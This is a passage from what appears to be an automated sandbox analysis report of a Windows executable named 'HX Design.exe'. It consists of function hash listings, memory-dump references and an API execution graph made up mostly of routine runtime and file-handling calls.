                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Message
                                                                                                                                                                                                                                                      • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                                      • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                                      • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                                      • Instruction ID: 18d21326473585813f69bcac6c3857d141485184f55478114089c1c0fb3aafce
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF21F772B08B41A2E710AB14F8447EAB3A0FB88780F804136EE8D93756EF7CD649D750
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2718003287-0
                                                                                                                                                                                                                                                      • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                                      • Instruction ID: d1f7a5cd22fe3baa11bd6ef399f1b89cb33fadc80c2f0bc43816602d35b28729
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8DD14872B08A8099E750EF79C4442FCB7B1FB54798B804236DE5E97B99DE78D00AD310
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1956198572-0
                                                                                                                                                                                                                                                      • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                      • Instruction ID: 82fb2f56c599b5cc0937f283f898b1152c69182c9412d4b5909f295937462b98
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35110C21F0C14692F654A769E54527AD292EF98780FC45030DF4907B9ECDBDD4C9E214
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID: ?
                                                                                                                                                                                                                                                      • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                      • Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                                                      • Instruction ID: 06acb41969bff98b8cf1a810aefbbc501edfce859f636a530e9ecd1182c6261c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8414822A0828266FB60BB65D40137BEFA0EF90BA4F944235EF5C06AD5DFBCD445DB10
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF732079046
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF73207A948: RtlFreeHeap.NTDLL(?,?,?,00007FF732082D22,?,?,?,00007FF732082D5F,?,?,00000000,00007FF732083225,?,?,?,00007FF732083157), ref: 00007FF73207A95E
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF73207A948: GetLastError.KERNEL32(?,?,?,00007FF732082D22,?,?,?,00007FF732082D5F,?,?,00000000,00007FF732083225,?,?,?,00007FF732083157), ref: 00007FF73207A968
                                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF73206CBA5), ref: 00007FF732079064
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                      • API String ID: 3580290477-898117248
                                                                                                                                                                                                                                                      • Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                                                      • Instruction ID: 5393ec9a557832e947cf457e9475c331e447da74764146fa45b56320814ce413
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F41A032A08B46A9EB54FF29D4400BDA3A4EF447D0BD54035E98D43B85DF7CE4A9E360
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                      • String ID: U
                                                                                                                                                                                                                                                      • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                      • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                                      • Instruction ID: c988a1df6911ca3dc0b333fb9211893b91e4159cc8f7deeba8f837b968dc4f28
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F741F532B18A8191EB60EF29E4443BAA7A0FB88784FC04131EE4D87B98EF7CD405D750
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentDirectory
                                                                                                                                                                                                                                                      • String ID: :
                                                                                                                                                                                                                                                      • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                      • Opcode ID: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                                                                                                                      • Instruction ID: 79cdbe61eb4637508e46f815839cba5eab8251c58c5db154b79e27c57ffdf7f8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03212B72B1828191EB20BB19D44827EB3B1FBC4B84FC54035DA5D43695DFBCD548DB60
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                      • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                                      • Instruction ID: 0827a57cd214d5d603c9843579ba64e3507f40d2e1e167af68632560fe601457
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C116D32608B8192EB219F15F40426AB7E5FB88B98F984230EF8D07768DF7CD555CB00
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID: :
                                                                                                                                                                                                                                                      • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                                      • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                                      • Instruction ID: 7d7887c1f5e57843612841c26cdfcad197fa124ac1919c008f8ab5197126098e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5301A721D1C30395F720BF64946527FA3A0EF44744FC00036D54D46691EFBCD548EB24

                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                      Execution Coverage:1.9%
                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                      Signature Coverage:1.2%
                                                                                                                                                                                                                                                      Total number of Nodes:822
                                                                                                                                                                                                                                                      Total number of Limit Nodes:32
                                                                                                                                                                                                                                                      execution_graph 105472 7ffe0032fd40 105474 7ffe0032fd50 105472->105474 105473 7ffe0032fd62 105474->105473 105478 7ffe003114bf 105474->105478 105482 7ffe0036f070 105474->105482 105486 7ffe00311df7 105474->105486 105478->105473 105479 7ffe0036e960 105478->105479 105480 7ffe0036f1c1 SetLastError 105479->105480 105481 7ffe0036f1d5 105479->105481 105480->105481 105481->105473 105483 7ffe0036f180 105482->105483 105484 7ffe0036f1c1 SetLastError 105483->105484 105485 7ffe0036f1d5 105483->105485 105484->105485 105485->105473 105486->105473 105487 7ffe0036eaa0 105486->105487 105488 7ffe0036f1c1 SetLastError 105487->105488 105489 7ffe0036f1d5 105487->105489 105488->105489 105489->105473 105490 7ff73207f98c 105491 7ff73207fb7e 105490->105491 105495 7ff73207f9ce _isindst 105490->105495 105537 7ff732074f08 11 API calls _set_fmode 105491->105537 105495->105491 105496 7ff73207fa4e _isindst 105495->105496 105511 7ff732086194 105496->105511 105501 7ff73207fbaa 105547 7ff73207a900 IsProcessorFeaturePresent 105501->105547 105508 7ff73207faab 105510 7ff73207fb6e 105508->105510 105536 7ff7320861d8 37 API calls _isindst 105508->105536 105538 7ff73206c550 105510->105538 105512 7ff7320861a3 105511->105512 105513 7ff73207fa6c 105511->105513 105551 7ff7320802d8 EnterCriticalSection 105512->105551 105518 7ff732085598 105513->105518 105515 7ff7320861ab 105516 7ff732086004 55 API calls 105515->105516 105517 7ff7320861bc 105515->105517 105516->105517 105519 7ff73207fa81 105518->105519 105520 7ff7320855a1 105518->105520 105519->105501 105524 7ff7320855c8 105519->105524 105552 7ff732074f08 11 API calls _set_fmode 105520->105552 105522 7ff7320855a6 105553 7ff73207a8e0 37 API calls _invalid_parameter_noinfo 105522->105553 105525 7ff73207fa92 105524->105525 105526 7ff7320855d1 105524->105526 105525->105501 105530 7ff7320855f8 105525->105530 105554 7ff732074f08 11 API calls _set_fmode 105526->105554 105528 7ff7320855d6 105555 7ff73207a8e0 37 API calls _invalid_parameter_noinfo 105528->105555 105531 7ff73207faa3 105530->105531 105532 7ff732085601 105530->105532 105531->105501 105531->105508 105556 7ff732074f08 11 API calls _set_fmode 105532->105556 105534 7ff732085606 105557 7ff73207a8e0 37 API calls _invalid_parameter_noinfo 105534->105557 105536->105510 105537->105510 105539 7ff73206c559 105538->105539 105540 7ff73206c564 105539->105540 105541 7ff73206c8e0 IsProcessorFeaturePresent 105539->105541 105542 7ff73206c8f8 105541->105542 105558 7ff73206cad8 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 105542->105558 105544 7ff73206c90b 105559 7ff73206c8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 105544->105559 105548 7ff73207a913 105547->105548 105560 7ff73207a614 14 API calls 3 library calls 105548->105560 105550 7ff73207a92e GetCurrentProcess TerminateProcess 105552->105522 105553->105519 105554->105528 105555->105525 105556->105534 105557->105531 105558->105544 105560->105550 105561 7ffe003815a0 105562 7ffe003815b8 105561->105562 105563 7ffe003816c6 105562->105563 105565 7ffe00311c1c 105562->105565 105565->105562 105566 7ffe00356e20 105565->105566 105568 7ffe00356eec 105566->105568 105569 7ffe003114bf SetLastError 105566->105569 105570 7ffe0036f070 SetLastError 105566->105570 105571 7ffe00311df7 SetLastError 105566->105571 105572 7ffe00311a0f 105566->105572 105568->105562 105569->105566 105570->105566 105571->105566 105572->105566 105573 7ffe0035ab70 105572->105573 105574 7ffe0035b8e1 00007FFE1FFB6570 105573->105574 105579 7ffe0035ace7 105573->105579 105575 7ffe0035b906 00007FFE1FFB6570 105574->105575 105574->105579 105576 7ffe0035b926 00007FFE1FFB6570 105575->105576 105575->105579 105577 7ffe0035b93d 00007FFE1FFB6570 105576->105577 105576->105579 105578 7ffe0035b957 00007FFE1FFB6570 105577->105578 105577->105579 105578->105579 105579->105566 105580 7ffe00355c00 105581 7ffe00355c1d 105580->105581 105582 7ffe00355d23 105581->105582 105585 7ffe00355d3e 105581->105585 105583 7ffe0031127b SetLastError 105582->105583 105584 7ffe00355d39 105583->105584 105585->105584 105587 7ffe0031127b 105585->105587 105587->105584 105589 7ffe00358a40 105587->105589 105588 7ffe00358ac3 SetLastError 105588->105589 105590 7ffe00358b27 105588->105590 105589->105588 105589->105590 105590->105584 105591 7ff732075628 105592 7ff732075642 105591->105592 105593 7ff73207565f 105591->105593 105642 7ff732074ee8 11 API calls _set_fmode 105592->105642 105593->105592 105594 7ff732075672 CreateFileW 105593->105594 105596 7ff7320756dc 105594->105596 105597 7ff7320756a6 105594->105597 105645 7ff732075c04 46 API calls 3 library calls 105596->105645 105616 7ff73207577c GetFileType 105597->105616 105598 7ff732075647 105643 7ff732074f08 11 API calls _set_fmode 105598->105643 105603 7ff7320756e1 105607 7ff7320756e5 105603->105607 105608 7ff732075710 105603->105608 105604 7ff73207564f 105644 7ff73207a8e0 37 API calls _invalid_parameter_noinfo 105604->105644 105605 7ff7320756bb CloseHandle 105611 7ff73207565a 105605->105611 105606 7ff7320756d1 CloseHandle 105606->105611 105646 7ff732074e7c 11 API calls 2 library calls 105607->105646 105647 7ff7320759c4 105608->105647 105615 7ff7320756ef 105615->105611 105617 7ff7320757ca 105616->105617 105618 7ff732075887 105616->105618 105619 7ff7320757f6 GetFileInformationByHandle 105617->105619 105665 7ff732075b00 21 API calls _fread_nolock 105617->105665 105620 7ff7320758b1 105618->105620 105621 7ff73207588f 105618->105621 105624 7ff7320758a2 GetLastError 105619->105624 105625 7ff73207581f 105619->105625 105622 7ff7320758d4 PeekNamedPipe 105620->105622 105641 7ff732075872 105620->105641 105621->105624 105626 7ff732075893 105621->105626 105622->105641 105668 7ff732074e7c 11 API calls 2 library calls 105624->105668 105627 7ff7320759c4 51 API calls 105625->105627 105667 7ff732074f08 11 API calls _set_fmode 105626->105667 105631 7ff73207582a 105627->105631 105630 7ff7320757e4 105630->105619 105630->105641 105658 7ff732075924 105631->105658 105632 7ff73206c550 _log10_special 8 API calls 105634 7ff7320756b4 105632->105634 105634->105605 105634->105606 105636 7ff732075924 10 API calls 105637 7ff732075849 105636->105637 105638 7ff732075924 10 API calls 105637->105638 105639 7ff73207585a 105638->105639 105639->105641 105666 7ff732074f08 11 API calls _set_fmode 105639->105666 105641->105632 105642->105598 105643->105604 105644->105611 105645->105603 105646->105615 105648 7ff7320759ec 105647->105648 105656 7ff73207571d 105648->105656 105669 7ff73207f724 51 API calls 2 library calls 105648->105669 105650 7ff732075a80 105650->105656 105670 7ff73207f724 51 API calls 2 library calls 105650->105670 105652 7ff732075a93 105652->105656 105671 7ff73207f724 51 API calls 2 library calls 105652->105671 105654 7ff732075aa6 105654->105656 105672 7ff73207f724 51 API calls 2 library calls 105654->105672 105657 7ff732075b00 21 API calls _fread_nolock 105656->105657 105657->105615 105659 7ff73207594d FileTimeToSystemTime 105658->105659 105660 7ff732075940 105658->105660 105661 7ff732075961 SystemTimeToTzSpecificLocalTime 105659->105661 105662 7ff732075948 105659->105662 105660->105659 105660->105662 105661->105662 105663 7ff73206c550 _log10_special 8 API calls 105662->105663 105664 7ff732075839 105663->105664 105664->105636 105665->105630 105666->105641 105667->105641 105668->105641 105669->105650 105670->105652 105671->105654 105672->105656 105673 7ffdfb302250 105677 7ffdfb3022ab new[] 105673->105677 105675 7ffdfb3023e1 105678 7ffdfb3023fd 00007FFE1A463010 105677->105678 105680 7ffdfb3023c4 105677->105680 105682 7ffdfb302408 new[] 105677->105682 105678->105682 105697 7ffdfb412900 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind capture_previous_context 105680->105697 105681 7ffdfb302665 105681->105680 105698 7ffdfb2f8a10 19 API calls 105681->105698 105682->105680 105682->105681 105683 7ffdfb2f92b0 105682->105683 105684 7ffdfb2f9335 105683->105684 105693 7ffdfb2f948d new[] 105683->105693 105686 7ffdfb2f934e new[] 105684->105686 105684->105693 105685 7ffdfb2f9390 new[] 105687 7ffdfb2f9455 00007FFE1A463010 105685->105687 105692 7ffdfb2f9679 105685->105692 105695 7ffdfb2f95c2 105685->105695 105688 7ffdfb2f9375 00007FFE1A463010 105686->105688 105686->105695 105689 7ffdfb2f962b 105687->105689 105690 7ffdfb2f9477 00007FFE1A463010 105687->105690 105688->105685 105691 7ffdfb2f962e 00007FFE1A463010 00007FFE1A463010 105689->105691 105690->105691 105691->105692 105692->105695 105699 7ffdfb2effd0 105692->105699 105693->105685 105693->105693 105693->105695 105712 7ffdfb3a5ae0 9 API calls 105693->105712 105695->105681 105697->105675 105698->105680 105701 7ffdfb2f0021 105699->105701 105704 7ffdfb2f01f0 CreateFileW 105701->105704 105707 7ffdfb2f0475 105701->105707 105711 7ffdfb2f03a8 105701->105711 105713 7ffdfb2efa10 15 API calls new[] 105701->105713 105714 7ffdfb2f0800 13 API calls 105701->105714 105715 7ffdfb2e9340 9 API calls 105701->105715 105703 7ffdfb2f0647 105703->105695 105704->105701 105716 7ffdfb2ed810 13 API calls 105707->105716 105709 7ffdfb2f04a0 105717 7ffdfb3a5ae0 9 API calls 105709->105717 105718 7ffdfb412900 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind capture_previous_context 105711->105718 105712->105685 105713->105701 105714->105701 105715->105701 105716->105709 105717->105711 105718->105703 105719 7ffdfb2f1230 GetSystemInfo 105720 7ffdfb2f1264 105719->105720 105721 7ffe00338150 105723 7ffe0033816a 105721->105723 105722 7ffe00338180 105723->105722 105725 7ffe0031112c 105723->105725 105725->105722 105726 7ffe0031ef00 105725->105726 105729 7ffe0031ef30 105726->105729 105728 7ffe0031ef1a 105728->105722 105730 7ffe00311325 105729->105730 105731 7ffe0031ef50 SetLastError 105730->105731 105732 7ffe0031ef70 105731->105732 105734 7ffe00311c1c 8 API calls 105732->105734 105733 7ffe0031efac 105733->105728 105734->105733 105735 7ffe00338e70 105736 7ffe00338e8a 105735->105736 105737 7ffe00338ea0 105736->105737 105739 7ffe0031204a 105736->105739 105739->105737 105740 7ffe0031f370 105739->105740 105741 7ffe0031f38a SetLastError 105740->105741 105742 7ffe0031f3aa 105741->105742 105742->105737 105743 7ff73206cc3c 105764 7ff73206ce0c 105743->105764 105746 7ff73206cd88 105915 7ff73206d12c 7 API calls 2 library calls 105746->105915 105747 7ff73206cc58 __scrt_acquire_startup_lock 105749 7ff73206cd92 105747->105749 105753 7ff73206cc76 __scrt_release_startup_lock 105747->105753 105916 7ff73206d12c 7 API calls 2 library calls 105749->105916 105751 7ff73206cc9b 105752 7ff73206cd9d __FrameHandler3::FrameUnwindToEmptyState 105753->105751 105754 7ff73206cd21 105753->105754 105912 7ff732079b2c 45 API calls 105753->105912 105770 7ff73206d274 105754->105770 105756 7ff73206cd26 105773 7ff732061000 105756->105773 105762 7ff73206cd49 105762->105752 105914 7ff73206cf90 7 API calls 105762->105914 105763 7ff73206cd60 105763->105751 105765 7ff73206ce14 105764->105765 105766 7ff73206ce20 __scrt_dllmain_crt_thread_attach 105765->105766 105767 7ff73206cc50 105766->105767 105768 7ff73206ce2d 105766->105768 105767->105746 105767->105747 105768->105767 105917 7ff73206d888 7 API calls 2 library calls 105768->105917 105918 7ff73208a4d0 105770->105918 105774 7ff732061009 105773->105774 105920 7ff732075484 105774->105920 105776 7ff7320637fb 105927 7ff7320636b0 105776->105927 105780 7ff73206c550 _log10_special 8 API calls 105782 7ff732063ca7 105780->105782 105913 7ff73206d2b8 GetModuleHandleW 105782->105913 105783 7ff73206383c 106026 7ff732061c80 105783->106026 105784 7ff73206391b 106031 7ff7320645c0 105784->106031 105788 7ff73206385b 105999 